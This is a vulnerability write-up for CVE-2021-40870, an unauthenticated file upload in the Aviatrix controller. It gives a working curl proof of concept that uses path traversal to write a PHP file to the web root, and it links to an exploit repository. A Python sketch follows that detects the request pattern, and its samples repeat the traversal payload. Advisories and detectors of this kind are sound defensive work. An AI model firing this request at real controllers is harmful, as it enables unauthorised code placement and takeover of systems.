JoyGhoshs's Contributions (2)
This vulnerability allows an attacker to create and store files on the Aviatrix controller. Exploitation doesn't need any user authentication and doesn't require any other user's interaction; it can be exploited simply using curl. Here is one example.
curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/poc.php -d 'data=hello<?php echo "Vulnerable Poc";?>'
# After executing the previous command, if the target is vulnerable, this will create a PHP file at this path: https://vulnerable.target.com/v1/poc
An attacker can do this unauthenticated because many API calls do not enforce an authentication check. This allows an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem.
Or you can use this exploit to do the exploitation more easily: https://github.com/JoyGhoshs/CVE-2021-40870
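For defenders, the request shape described above can be matched on the wire. The following detection sketch is an added example, not part of the original contribution or of Aviatrix's code; it assumes a reverse proxy or WAF that records the path and form-encoded body of each POST, and the reason labels and sample records are constructed for illustration.

```python
from urllib.parse import parse_qs, unquote
import posixpath

# Assumption: the proxy/WAF in front of the controller logs path and POST body.
ENDPOINT = "/v1/backend1"
ACTION = "set_metric_gw_selections"

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %252e%252e) before inspection."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_account_name(name):
    """Return the reasons an account_name value looks like a file path."""
    name = fully_decode(name).replace("\\", "/")
    reasons = []
    if ".." in name.split("/"):
        reasons.append("traversal")
    if "/" in name:
        reasons.append("path-separator")
    if posixpath.splitext(name)[1].lower() in {".php", ".phtml", ".phar"}:
        reasons.append("script-extension")
    return reasons

def inspect_request(path, body):
    """Flag a request to the endpoint whose account_name is path-like."""
    if path.split("?")[0].rstrip("/") != ENDPOINT:
        return []
    fields = parse_qs(body, keep_blank_values=True)
    if ACTION not in fields.get("action", []):
        return []
    reasons = []
    for name in fields.get("account_name", []):
        reasons.extend(r for r in suspicious_account_name(name) if r not in reasons)
    return reasons

# Constructed sample records (path, body); not taken from real traffic.
SAMPLES = [
    ("/v1/backend1", "CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/poc.php&data=hello"),
    ("/v1/backend1", "CID=x&action=set_metric_gw_selections&account_name=%252e%252e%252fpoc.php&data=x"),
    ("/v1/backend1", "CID=abc&action=set_metric_gw_selections&account_name=prod-account&data=%7B%7D"),
]

if __name__ == "__main__":
    for path, body in SAMPLES:
        print(inspect_request(path, body) or "ok", body[:70])
```

Any non-empty result for an unauthenticated request is worth an alert, and a follow-up check of the web root for unexpected .php files confirms whether a write succeeded.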